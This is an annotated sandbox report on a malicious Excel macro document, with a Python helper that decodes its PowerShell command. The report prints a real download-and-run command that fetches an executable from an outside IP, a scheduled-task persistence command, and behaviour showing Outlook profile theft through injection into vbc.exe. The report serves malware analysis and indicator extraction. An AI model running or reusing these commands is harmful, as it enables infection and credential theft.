Analysis
max time kernel: 125s
max time network: 151s
platform: windows10_x64
resource: win10-en-20211014
submitted: 25-10-2021 12:46

Tasks
Static task: static1
Behavioral task: behavioral1, sample Sample_03018200_ISO_03512328.xlsm, resource win7-en-20211014
Behavioral task: behavioral2, sample Sample_03018200_ISO_03512328.xlsm, resource win10-en-20211014 (the results on this page are from this task: platform windows10_x64, resource win10-en-20211014)
General
Target: Sample_03018200_ISO_03512328.xlsm
Size: 389KB
MD5: 02c95603229648cdcc202dbfcb0986d1
SHA1: 3e54ebf74799844c8de1922c5cd4b60f1d8c0340
SHA256: 54ff9c472be10b924ae15c252e08bb870e1a1cf8361a00b74cc0d03113dd6e54
SHA512: 5c714532a453ace9c32662acbe9872a670946ef3bca244226f48d882737424a3c9561b11f2ad8b9241c64ed1d48f007b60423043b7c973df80767715f9e9b3ee
Malware Config
Extracted URL: http://18.159.149.5/nbl/joy/1-1/Sample_03018200_ISO_03512328.exe
This is the second-stage download: it is the DownloadFile target of the encoded powershell.exe command in the process tree, which saves the file as %APPDATA%\Xnhhhbltuspnhydgofsx.exe and starts it.
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | target pid | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2976 | 4112 | cmd.exe | EXCEL.EXE

Blocklisted process makes network request (1 IoC)
Processes:
  flow | pid | process
  41 | 1516 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
Processes:
  pid | process
  932 | Xnhhhbltuspnhydgofsx.exe
  3960 | update.exe

Deletes itself (1 IoC)
Processes:
  pid | process
  4112 | EXCEL.EXE

Uses the VBS compiler for execution (1 TTP)
vbc.exe is the Visual Basic .NET compiler shipped with the .NET Framework. In this run it is started by Xnhhhbltuspnhydgofsx.exe (pid 932) with no arguments and is the target of that process's SetThreadContext call (see below), with a mapping recorded at 0x4203EE inside pid 2036. That is the pattern of code being injected into a hollowed host process, not of anything being compiled: the Outlook profile access reported further down is performed from this vbc.exe, so pid 2036 is where the payload actually runs and the process to dump.
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | vbc.exe
  Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | vbc.exe
  Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | vbc.exe

Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  43 | checkip.dyndns.org
  45 | freegeoip.app
  46 | freegeoip.app

Suspicious use of SetThreadContext (1 IoC)
Processes:
  description | pid | process | target process
  PID 932 set thread context of 2036 | 932 | Xnhhhbltuspnhydgofsx.exe | vbc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature adds "Likely ransomware behaviour", but nothing else in this report (Outlook profile access, external IP lookup, injection into vbc.exe, a minute-interval scheduled task) points to file encryption; read the drive enumeration as consistent with information theft rather than as a ransomware indicator.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
These reads are attributed to EXCEL.EXE, the host application, not to the dropped binary, so on their own they are weak evidence of sandbox evasion by the malware.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Here the task is created by pid 5072: schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f, i.e. a task named "Nano" that relaunches the copied payload every minute.

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

NTFS ADS (1 IoC)
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Local\Temp\78467F00\:Zone.Identifier:$DATA | EXCEL.EXE
A Zone.Identifier stream is the Mark-of-the-Web; it is written here by EXCEL.EXE on a temporary copy under 78467F00, not by the payload.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid | process
  4112 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid | process
  1516 | powershell.exe (3 times)
  2036 | vbc.exe

Suspicious behavior: RenamesItself (1 IoC)
Processes:
  pid | process
  4112 | EXCEL.EXE

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1516 | powershell.exe
  Token: SeDebugPrivilege | 932 | Xnhhhbltuspnhydgofsx.exe
  Token: SeDebugPrivilege | 2036 | vbc.exe
  Token: SeDebugPrivilege | 3960 | update.exe

Suspicious use of SetWindowsHookEx (13 IoCs)
Processes:
  pid | process
  4112 | EXCEL.EXE (13 times)

Suspicious use of WriteProcessMemory (25 IoCs)
Processes (identical rows collapsed, count in the last column):
  pid | process | target pid | target process | writes
  4112 | EXCEL.EXE | 2976 | cmd.exe | 2
  2976 | cmd.exe | 1516 | powershell.exe | 3
  1516 | powershell.exe | 932 | Xnhhhbltuspnhydgofsx.exe | 3
  932 | Xnhhhbltuspnhydgofsx.exe | 2036 | vbc.exe | 8
  932 | Xnhhhbltuspnhydgofsx.exe | 3204 | cmd.exe | 3
  932 | Xnhhhbltuspnhydgofsx.exe | 2628 | cmd.exe | 3
  3204 | cmd.exe | 5072 | schtasks.exe | 3
The eight writes from 932 into vbc.exe (2036), against two or three for every ordinary parent/child pair above, line up with the SetThreadContext entry: this is the injection step.

outlook_office_path (1 IoC)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | vbc.exe

outlook_win_path (1 IoC)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | vbc.exe
Processes
Process tree; indentation shows parent/child and the PIDs are taken from the signature tables above.

- [pid 4112] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Sample_03018200_ISO_03512328.xlsm"
  Signatures: Deletes itself; Checks processor information in registry; Enumerates system info in registry; NTFS ADS; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: RenamesItself; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - [pid 2976] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Bhzhhoufwr.bat
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - [pid 1516] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBYAG4AaABoAGgAYgBsAHQAdQBzAHAAbgBoAHkAZABnAG8AZgBzAHgALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAxADgALgAxADUAOQAuADEANAA5AC4ANQAvAG4AYgBsAC8AagBvAHkALwAxAC0AMQAvAFMAYQBtAHAAbABlAF8AMAAzADAAMQA4ADIAMAAwAF8ASQBTAE8AXwAwADMANQAxADIAMwAyADgALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      Decoded -enc argument (base64 of UTF-16LE): $ProcName = "Xnhhhbltuspnhydgofsx.exe";(New-Object System.Net.WebClient).DownloadFile("http://18.159.149.5/nbl/joy/1-1/Sample_03018200_ISO_03512328.exe","$env:APPDATA\$ProcName");Start-Process ("$env:APPDATA\$ProcName")
      (-win 1 is -WindowStyle Hidden; the URL is the one listed under Malware Config.)
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [pid 932] C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe
        "C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe"
        Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - [pid 2036] C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Signatures: Accesses Microsoft Outlook profiles; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path
        - [pid 3204] C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f
          Signatures: Suspicious use of WriteProcessMemory
          - [pid 5072] C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f
            Signatures: Creates scheduled task(s)
        - [pid 2628] C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe" "C:\Users\Admin\AppData\Roaming\update\update.exe"
- [pid 3960] C:\Users\Admin\AppData\Roaming\update\update.exe
  C:\Users\Admin\AppData\Roaming\update\update.exe
  (No parent is shown in the report; this is the copied payload that the "Nano" scheduled task runs every minute.)
  Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
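The -enc argument on the powershell.exe line above is base64 over UTF-16LE, which is what PowerShell's -EncodedCommand expects, so it decodes offline with no PowerShell involved. The following is an added example, not part of the report: it decodes that blob (copied verbatim from the process tree) and pulls the download URL and the resolved drop path out of it. The regexes and the variable-substitution step are this example's own and deliberately simple; they handle the `$Var = "literal"` pattern this script uses and nothing fancier.

```python
"""Added example, not from the sandbox report: decode a PowerShell
-EncodedCommand blob (base64 of UTF-16LE) and extract IOCs from it.
ENCODED is the blob from the report's process tree, copied verbatim."""
import base64
import re

ENCODED = "JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBYAG4AaABoAGgAYgBsAHQAdQBzAHAAbgBoAHkAZABnAG8AZgBzAHgALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAxADgALgAxADUAOQAuADEANAA5AC4ANQAvAG4AYgBsAC8AagBvAHkALwAxAC0AMQAvAFMAYQBtAHAAbABlAF8AMAAzADAAMQA4ADIAMAAwAF8ASQBTAE8AXwAwADMANQAxADIAMwAyADgALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA"

URL_RE = re.compile(r"https?://[^\s\"'\)]+")
# $Name = "literal"   (the only assignment form this script uses)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\"([^\"]*)\"")
# "$env:VAR\..." paths, possibly containing $Name references
ENV_PATH_RE = re.compile(r"\"(\$env:\w+\\[^\"]*)\"")


def decode_encoded_command(blob: str) -> str:
    """Undo -EncodedCommand: re-pad the base64 (the '=' are often stripped
    when copied), decode it, then decode the bytes as UTF-16LE."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """URLs, drop paths with $Name substituted from simple assignments,
    and whether the script launches what it fetched."""
    assignments = dict(ASSIGN_RE.findall(script))
    drop_paths = set()
    for path in ENV_PATH_RE.findall(script):
        for name, value in assignments.items():
            path = path.replace("$" + name, value)
        drop_paths.add(path)
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "drop_paths": sorted(drop_paths),
        "assignments": assignments,
        "launches_payload": "Start-Process" in script,
    }


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED)
    print(script)
    for key, value in extract_iocs(script).items():
        print(f"{key}: {value}")
```

Decoded, the script assigns the executable name, fetches the URL listed under Malware Config with System.Net.WebClient.DownloadFile into $env:APPDATA, and runs it with Start-Process; that is what the report records as the downloaded Xnhhhbltuspnhydgofsx.exe under AppData\Roaming. The same decoder works for any -EncodedCommand argument; only the IOC regexes are tied to this script's shape.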
Downloads
C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe (the file fetched from the extracted URL)
MD5: 1044474c0c3401651b09cc8886f4039f
SHA1: 60e64f712184f6d9b18ed6f59a07cd16221bbbf3
SHA256: c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127
SHA512: adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b
C:\Users\Admin\AppData\Roaming\update\update.exe (byte-identical copy of Xnhhhbltuspnhydgofsx.exe: same hashes, made by the copy command in the process tree)
MD5: 1044474c0c3401651b09cc8886f4039f
SHA1: 60e64f712184f6d9b18ed6f59a07cd16221bbbf3
SHA256: c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127
SHA512: adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b
C:\Users\Admin\Documents\Bhzhhoufwr.bat (written by the macro; launched by cmd.exe pid 2976)
MD5: 26f4e76105e1ce65d46a488506505a8e
SHA1: ea081b9ce8b93bf0aeca01cebb2fbfae4118f341
SHA256: b87516affc3c79b900c1fdf1d9086070411c22fad2a665875e032519df22d327
SHA512: 2a194c8e1dec4702aac07ec24b2804cc184418b0549b66759075fe0a23a8b959aeace549ff02c997da2efd0a7d1a123744c8abc2fa1b1c1389addf913574f916
Memory dumps (file name is pid-sequence-address range):
memory/932-344-0x0000000005070000-0x0000000005071000-memory.dmp (4KB)
memory/932-334-0x0000000000000000-mapping.dmp
memory/1516-308-0x0000000007502000-0x0000000007503000-memory.dmp (4KB)
memory/1516-326-0x0000000007503000-0x0000000007504000-memory.dmp (4KB)
memory/1516-307-0x0000000007500000-0x0000000007501000-memory.dmp (4KB)
memory/1516-298-0x0000000000000000-mapping.dmp
memory/2036-346-0x00000000004203EE-mapping.dmp (mapping at a non-zero address inside vbc.exe; this matches the SetThreadContext signature and is the region to pull for the injected payload)
memory/2036-623-0x0000000006C30000-0x0000000006CCC000-memory.dmp (624KB)
memory/2628-355-0x0000000000000000-mapping.dmp
memory/2976-296-0x0000000000000000-mapping.dmp
memory/3204-354-0x0000000000000000-mapping.dmp
memory/3960-1114-0x0000000004AD0000-0x0000000004AD1000-memory.dmp (4KB)
memory/4112-115-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp (64KB)
memory/4112-118-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp (64KB)
memory/4112-119-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp (64KB)
memory/4112-120-0x000001A52F550000-0x000001A52F552000-memory.dmp (8KB)
memory/4112-121-0x000001A52F550000-0x000001A52F552000-memory.dmp (8KB)
memory/4112-117-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp (64KB)
memory/4112-116-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp (64KB)
memory/4112-122-0x000001A52F550000-0x000001A52F552000-memory.dmp (8KB)
memory/5072-356-0x0000000000000000-mapping.dmp